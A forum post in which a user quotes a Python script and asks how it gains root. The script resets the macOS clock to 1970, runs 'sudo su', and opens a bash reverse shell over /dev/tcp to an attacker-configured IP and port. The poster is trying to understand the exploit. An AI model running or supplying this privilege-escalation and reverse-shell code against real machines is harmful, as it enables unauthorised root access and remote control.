[3SidedSquare]

Code:

#!/usr/bin/python
##Various comments##
import subprocess

# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"

# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"

# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)

Ok, from python documentation for 3.2.2:

Code:

On Unix with shell=True, the shell defaults to /bin/sh. If args is a string, the string specifies the command to execute through the shell. This means that the string must be formatted exactly as it would be when typed at the shell prompt. This includes, for example, quoting or backslash escaping filenames with spaces in them.

and

Code:

If the stdin argument was PIPE, this attribute is a file object that provides input to the child process. Otherwise, it is None.

If the stdout argument was PIPE, this attribute is a file object that provides output from the child process. Otherwise, it is None.

If the stderr argument was PIPE, this attribute is a file object that provides error output from the child process. Otherwise, it is None.

So from what I understand, Popen('bash'... ) should open a bash shell, and the std*=subprocess.PIPE should give whatever the bash shell spits out as the "request" in the reverse shell.

Code:

proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
##More various junk###

First, what's with the date? Is it really necessary to -setdate 01:01:1970?
second, shouldn't the second part,
sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)
require root access in the first place? I'm just a little confused, because it doesn't seem to me like we have root access yet, only access at the level of the person who runs the script.
Someone help?